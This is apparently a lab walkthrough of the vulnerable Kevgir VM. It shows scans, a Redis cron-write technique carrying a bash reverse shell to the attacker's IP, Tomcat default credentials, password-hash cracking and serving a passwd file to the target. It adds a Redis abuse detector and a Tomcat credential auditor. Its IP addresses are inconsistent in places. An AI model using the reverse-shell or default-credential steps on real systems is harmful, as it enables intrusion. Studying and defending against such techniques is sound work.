```
promote at ~ ❯ nmap -T5 -sP 192.168.56.0/24
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-18 21:13 CST
Nmap scan report for promote.cache-dns.local (192.168.56.1)
Host is up (0.00064s latency).
Nmap scan report for promote.cache-dns.local (192.168.56.100)
Host is up (0.00082s latency).
Nmap scan report for promote.cache-dns.local (192.168.56.101)
Host is up (0.0025s latency).
Nmap done: 256 IP addresses (3 hosts up) scanned in 1.83 seconds
```

The first is the gateway, the second is the local machine's IP, and the third is the target machine Kevgir (how to tell? Entering http://172.20.10.8 in the browser opens the web service running on its port 80).
```
promote at ~ ❯ nmap -A -p 6379 --script=redis-info 192.168.56.101
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-18 21:55 CST
Nmap scan report for promote.cache-dns.local (192.168.56.101)
Host is up (0.00051s latency).

PORT     STATE SERVICE VERSION
6379/tcp open  redis   Redis key-value store 3.0.7 (32 bits)
| redis-info:
|   Version: 3.0.7
|   Operating System: Linux 3.19.0-25-generic i686
|   Architecture: 32 bits
|   Process ID: 1185
|   Used CPU (sys): 2.13
|   Used CPU (user): 0.70
|   Connected clients: 1
|   Connected slaves: 0
|   Used memory: 622.68K
|   Role: master
|   Bind addresses:
|     0.0.0.0
|   Client connections:
|_    192.168.56.1
```
Before exploiting this vulnerability, first listen on a local port.

```
promote at ~ ❯ ncat -lvnp 7999
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::7999
Ncat: Listening on 0.0.0.0:7999
```
Note that the local machine's IP is 10.32.187.196.

Connect with redis-cli and prepare to use crontab to get a reverse shell.

```
promote at ~ ❯ redis-cli -h 192.168.56.101
192.168.56.101:6379> set x "\n* * * * * bash -i >& /dev/tcp/10.32.187.196/7999 0>&1\n"
OK
192.168.56.101:6379> config set dir /var/spool/cron/
OK
192.168.56.101:6379> config set dbfilename root
OK
192.168.56.101:6379> save
OK
192.168.56.101:6379> keys *
1) "x"
192.168.56.101:6379> get x
"\n* * * * * bash -i >& /dev/tcp/10.32.187.196/7999 0>&1\n"
```
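From the defender's side, the sequence above (CONFIG SET dir to a cron directory, CONFIG SET dbfilename, then SAVE, from an unauthenticated client) is a very recognisable pattern in Redis command telemetry. The following is an added example, not part of the original writeup, showing a small detector that walks lines in the format `redis-cli MONITOR` prints (timestamp, database, client address, quoted command and arguments) and flags that pattern. The sample lines, the list of sensitive directories and the severity labels are all constructed for the example.

```python
import re
from typing import Dict, List, Optional

# Directories where a Redis dump file is never legitimately written; a dump landing
# here means the server is being used as an arbitrary-file-write primitive.
# (Constructed list for the example; extend it for your own environment.)
SENSITIVE_DIR_PATTERNS = [
    r"^/var/spool/cron(/|$)",
    r"^/etc/cron",
    r"^/root/\.ssh(/|$)",
    r"^/home/[^/]+/\.ssh(/|$)",
    r"^/var/www(/|$)",
]

# A value that starts (or continues after an escaped newline) with five
# cron-style fields followed by a command looks like a crontab entry.
CRON_LINE_RE = re.compile(r"(^|\\n)\s*(?:[\d*,/-]+\s+){5}\S")

# MONITOR line shape: "<unix ts> [<db> <client ip:port>] "cmd" "arg" ..."
MONITOR_RE = re.compile(r'^(?P<ts>\d+\.\d+) \[(?P<db>\d+) (?P<client>[^\]]+)\] (?P<rest>.*)$')
ARG_RE = re.compile(r'"((?:[^"\\]|\\.)*)"')

# Constructed sample telemetry (not captured from the target machine).
SAMPLE_MONITOR_LINES = [
    '1597784100.123456 [0 192.168.56.1:51234] "set" "x" "\\n* * * * * /tmp/x\\n"',
    '1597784101.234567 [0 192.168.56.1:51234] "config" "set" "dir" "/var/spool/cron/"',
    '1597784102.345678 [0 192.168.56.1:51234] "config" "set" "dbfilename" "root"',
    '1597784103.456789 [0 192.168.56.1:51234] "save"',
    '1597784104.567890 [0 10.0.0.5:40001] "config" "set" "dir" "/var/lib/redis"',
    '1597784105.678901 [0 10.0.0.5:40001] "save"',
    '1597784106.789012 [0 10.0.0.5:40001] "get" "session:abc"',
]


def is_sensitive_dir(path: str) -> bool:
    return any(re.match(p, path) for p in SENSITIVE_DIR_PATTERNS)


def parse_monitor_line(line: str) -> Optional[Dict]:
    """Split one MONITOR line into timestamp, client and lower-cased command + args."""
    m = MONITOR_RE.match(line)
    if not m:
        return None
    args = ARG_RE.findall(m.group("rest"))
    if not args:
        return None
    return {"ts": float(m.group("ts")), "client": m.group("client"),
            "cmd": args[0].lower(), "args": args[1:]}


def detect_redis_file_write_abuse(lines: List[str]) -> List[Dict]:
    """Return alerts for CONFIG SET dir/dbfilename + SAVE abuse, tracked per client."""
    alerts: List[Dict] = []
    state: Dict[str, Dict[str, str]] = {}  # client -> last dir / dbfilename it set
    for line in lines:
        ev = parse_monitor_line(line)
        if ev is None:
            continue
        st = state.setdefault(ev["client"], {})
        cmd, args = ev["cmd"], ev["args"]

        def alert(severity: str, reason: str) -> None:
            alerts.append({"ts": ev["ts"], "client": ev["client"],
                           "severity": severity, "reason": reason, "line": line})

        if cmd == "config" and len(args) >= 3 and args[0].lower() == "set":
            key, value = args[1].lower(), args[2]
            if key == "dir":
                st["dir"] = value
                if is_sensitive_dir(value):
                    alert("high", f"CONFIG SET dir to sensitive path {value}")
            elif key == "dbfilename":
                st["dbfilename"] = value
                if not value.endswith(".rdb"):
                    alert("medium", f"CONFIG SET dbfilename to non-rdb name {value}")
        elif cmd == "set" and len(args) >= 2 and CRON_LINE_RE.search(args[1]):
            alert("medium", f"value stored under key {args[0]!r} looks like a crontab entry")
        elif cmd in ("save", "bgsave") and is_sensitive_dir(st.get("dir", "")):
            alert("critical", f"dump written into {st['dir']} as {st.get('dbfilename', '?')}")
    return alerts


if __name__ == "__main__":
    for a in detect_redis_file_write_abuse(SAMPLE_MONITOR_LINES):
        print(f"[{a['severity']:<8}] {a['client']}: {a['reason']}")
```

The second client in the sample sets `dir` to a normal data directory and saves, and produces no alert, which is the point of tracking state per client rather than alerting on every CONFIG SET. In production, MONITOR is expensive on a busy instance; the same logic applies to whatever command log you already collect. The real fix is configuration, not detection: bind Redis to a private interface, set `requirepass` (or ACLs on Redis 6+), keep `protected-mode yes`, and use `rename-command CONFIG ""` so clients cannot relocate the dump file at all.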
```
promote at ~ ❯ nikto -h 192.168.56.101 -p 8080 -o kevgir.8080.html
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.56.101
+ Target Hostname:    192.168.56.101
+ Target Port:        8080
+ Start Time:         2020-08-20 13:03:40 (GMT8)
---------------------------------------------------------------------------
+ Server: Apache-Coyote/1.1
+ Server leaks inodes via ETags, header found with file /, fields: 0xW/1895 0x1454530701000
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Allowed HTTP Methods: GET, HEAD, POST, PUT, DELETE, OPTIONS
+ OSVDB-397: HTTP method ('Allow' Header): 'PUT' method could allow clients to save files on the web server.
+ OSVDB-5646: HTTP method ('Allow' Header): 'DELETE' may allow clients to remove files on the web server.
+ /: Appears to be a default Apache Tomcat install.
+ /examples/servlets/index.html: Apache Tomcat default JSP pages present.
+ OSVDB-3720: /examples/jsp/snp/snoop.jsp: Displays information about page retrievals, including other users.
+ Default account found for 'Tomcat Manager Application' at /manager/html (ID 'tomcat', PW 'tomcat'). Apache Tomcat.
+ /manager/html: Tomcat Manager / Host Manager interface found (pass protected)
+ /host-manager/html: Tomcat Manager / Host Manager interface found (pass protected)
+ /manager/status: Tomcat Server Status interface found (pass protected)
+ 7661 requests: 0 error(s) and 14 item(s) reported on remote host
+ End Time:           2020-08-20 13:03:48 (GMT8) (8 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
```

The report shows a login page with default credentials:

| URI | HTTP Method | Description |
|---|---|---|
| /manager/html | GET | Default account found for 'Tomcat Manager Application' at /manager/html (ID 'tomcat', PW 'tomcat'). Apache Tomcat. |
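A Tomcat manager account with a shipped default password is a configuration defect that is cheap to catch before a scanner does. As an added example (not from the original writeup or from the Tomcat project), the script below audits a `tomcat-users.xml` for the well-known default username/password pairs, passwords equal to the username, short passwords, and which of those accounts hold manager or host-manager roles. The XML document is constructed inline for the example; the default-credential list is the set of pairs that ship commented out in Tomcat's stock `tomcat-users.xml` plus `admin/admin`.

```python
import xml.etree.ElementTree as ET
from typing import Dict, List

# Constructed tomcat-users.xml for the example (not taken from the target machine).
SAMPLE_TOMCAT_USERS = """<?xml version="1.0" encoding="UTF-8"?>
<tomcat-users xmlns="http://tomcat.apache.org/xml" version="1.0">
  <role rolename="manager-gui"/>
  <role rolename="admin-gui"/>
  <user username="tomcat" password="tomcat" roles="manager-gui,admin-gui"/>
  <user username="deployer" password="s3cr3tLongPassphrase!" roles="manager-script"/>
  <user username="viewer" password="viewer" roles="manager-status"/>
</tomcat-users>
"""

# Username/password pairs that appear in Tomcat's stock example config or are
# otherwise widely known defaults.
DEFAULT_CREDS = {
    ("tomcat", "tomcat"), ("tomcat", "s3cret"), ("admin", "admin"),
    ("admin", "tomcat"), ("both", "tomcat"), ("role1", "tomcat"),
}
# Roles that grant deployment or host configuration, i.e. code execution on the server.
PRIVILEGED_ROLES = {"manager-gui", "manager-script", "manager-jmx",
                    "admin-gui", "admin-script"}
MIN_PASSWORD_LEN = 12  # example policy threshold, not a Tomcat setting


def _local_name(tag: str) -> str:
    """Strip the XML namespace so 'user' matches with or without xmlns."""
    return tag.rsplit("}", 1)[-1]


def audit_tomcat_users(xml_text: str) -> List[Dict[str, str]]:
    """Return one finding per weak-credential or privileged-role condition."""
    root = ET.fromstring(xml_text)
    findings: List[Dict[str, str]] = []
    for elem in root.iter():
        if _local_name(elem.tag) != "user":
            continue
        name = elem.get("username", "")
        password = elem.get("password", "")
        roles = {r.strip() for r in elem.get("roles", "").split(",") if r.strip()}

        # Credential checks, strongest condition first so each user gets one verdict.
        if (name, password) in DEFAULT_CREDS:
            findings.append({"user": name, "issue": "default-credential"})
        elif password == name:
            findings.append({"user": name, "issue": "password-equals-username"})
        elif len(password) < MIN_PASSWORD_LEN:
            findings.append({"user": name, "issue": "short-password"})

        # Privilege check is reported only when the credential is also weak,
        # because that combination is what turns a bad password into code execution.
        weak = findings and findings[-1]["user"] == name
        if weak and roles & PRIVILEGED_ROLES:
            findings.append({"user": name, "issue": "weak-credential-with-privileged-role",
                             "roles": ",".join(sorted(roles & PRIVILEGED_ROLES))})
    return findings


if __name__ == "__main__":
    for f in audit_tomcat_users(SAMPLE_TOMCAT_USERS):
        print(f)
```

Run it against each Tomcat host's `conf/tomcat-users.xml`; `deployer` passes cleanly, `viewer` is flagged for a password equal to its username, and `tomcat` is flagged twice because the default password sits on an account with `manager-gui` and `admin-gui`. On a real deployment, the manager application should also be restricted by a `RemoteAddrValve`, or removed entirely where it is not needed.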
```
➜ ~ john shadow
Created directory: /root/.john
Using default input encoding: UTF-8
Loaded 3 password hashes with 3 different salts (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 2 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
admin            (admin)
Warning: Only 7 candidates buffered for the current salt, minimum 8 needed for performance.
resu             (user)
Warning: Only 2 candidates buffered for the current salt, minimum 8 needed for performance.
Warning: Only 7 candidates buffered for the current salt, minimum 8 needed for performance.
Warning: Only 2 candidates buffered for the current salt, minimum 8 needed for performance.
Almost done: Processing the remaining buffered candidate passwords, if any.
Warning: Only 5 candidates buffered for the current salt, minimum 8 needed for performance.
Proceeding with wordlist:/usr/share/john/password.lst, rules:Wordlist
2g 0:00:00:17 33.62% 2/3 (ETA: 13:37:38) 0.1174g/s 3439p/s 3439c/s 3439C/s blazer0..copper0
Proceeding with incremental:ASCII
```

```
promote at ~ ❯ http-server .
Starting up http-server, serving .
Available on:
  http://127.0.0.1:8080
  http://10.32.187.196:8080
  http://192.168.56.1:8080
  http://10.211.55.2:8080
  http://192.168.57.2:8080
Hit CTRL-C to stop the server
[2020-08-19T05:50:16.269Z]  "GET /" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36"
(node:84873) [DEP0066] DeprecationWarning: OutgoingMessage.prototype._headers is deprecated
[2020-08-19T05:50:16.602Z]  "GET /favicon.ico" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36"
[2020-08-19T05:50:16.603Z]  "GET /favicon.ico" Error (404): "Not found"
[2020-08-19T05:50:37.045Z]  "GET /passwd" "Wget/1.15 (linux-gnu)"
[2020-08-19T05:51:02.060Z]  "GET /passwd" "Wget/1.15 (linux-gnu)"
```